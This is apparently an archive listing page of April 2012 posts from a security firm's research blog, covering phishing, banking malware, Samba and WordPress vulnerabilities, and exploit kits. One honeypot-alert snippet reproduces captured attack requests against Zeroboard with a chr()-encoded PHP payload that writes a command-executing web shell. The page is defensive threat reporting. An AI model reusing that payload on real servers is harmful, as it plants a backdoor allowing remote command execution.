Showing 20 results for: April 2012 ×

Update from Trustwave SpiderLabs EMEA, London

It was a hectic week in London. In case you hadn't heard its was InfoSec europe week, but we were also busy with the SC Awards dinner (where PenTest Manager won the innovation award), Bsides London, 44 café, speaking at...

Brazilian Banking Malware: Pay Your Bill Slacker!

I recently got wind of an interesting little sample that I believe originated as part of a Brazilian phishing attack. The sample appears to still be quite unknown, as VirusTotal reports currently (VirusTotal Report) reports the sample as being detected...

Pwning a Spammer's Keylogger

Recently, while scrounging around our spam traps, I spotted this ordinary piece of malicious spam. It uses a very simple social engineering trick, speculating about Obama's sexual orientation and a link to a supposed picture to prove it. There was...

WordPress 3.3.2 Addresses Setup XSS Vulnerabilities

Back in January we released a security advisory for WordPress, which included four vulnerabilities in the installation scripts. After discussing these issues with the WordPress team, it was decided that the vulnerabilities were not going to be fixed immediately in...

Come and Join Us at InfoSecurity

This week we will be presenting and speaking at InfoSecurity, Europe's No.1 Information Security event (April 24th - 26th). We'll have our stand ready, marked D20, with materials and a small amphitheatre where I will be giving presentations on various...

TrustKeeper Scan Engine Update

Summary A remote code execution vulnerability in Samba was disclosed last week, which affects Samba versions 3.0.x – 3.6.3 and could allow root access to an affected system from an anonymous user. This TrustKeeper Scan Engine update includes vulnerability checks...

[Honeypot Alert] Joomla com_s5clanroster Local File Inclusion Attacks

Our web honeypots picked up some increased scanning for the following Exploit-DB vulnerability: ================================================================================================================== [o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability Software : com_s5clanroster Vendor : http://www.shape5.com Author : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf...

Australian Apple Store Customers Targeted by Phishers

Recently, we came across a phishing attack targeting Australian Apple Store customers. The phishing scam claims to offer a $AU100 Apple Store credit when buying a $9 Australian Dollar Apple discount card. Does it sound legit or too good to...

TrustKeeper Scan Engine Update

TrustKeeper Scan Engine is the scanner that powers Trustwave's Vulnerability Scanning Services, which help organizations around the world find vulnerabilities in their network environments. It also happens to be a key component of the TrustKeeper service that is used by...

Smart Meter Attacks: Old Vectors Die Hard

Much has been made of the recent attacks against a Puerto Rican utility's smart metering system, and perhaps it's warranted in some ways. After all, theft is theft, whether it's power, your bicycle, or beer out of my fridge. Those...

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Our web honeypots recently identified attacks for CVE-2009-4834 which is a vulnerability within Zeroboard: 123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304 123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290 123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET...

RCE root in all current Samba versions

While perusing the change log for the release of SAMBA that was pushed out today a member of the SpiderLabs team (Rodrigo Montoro) noticed a CVE number in the change log. When we dug a little deeper we found that...

A New Neighbor in Town: The Nuclear Pack v2.0 Exploit Kit

In the past few years, cybercriminals have been increasingly using exploit kits to spread malware. Today, several exploit kits, primarily Blackhole and Phoenix, dominate this market but occasionally we do find other rare ones that are being deployed. We would...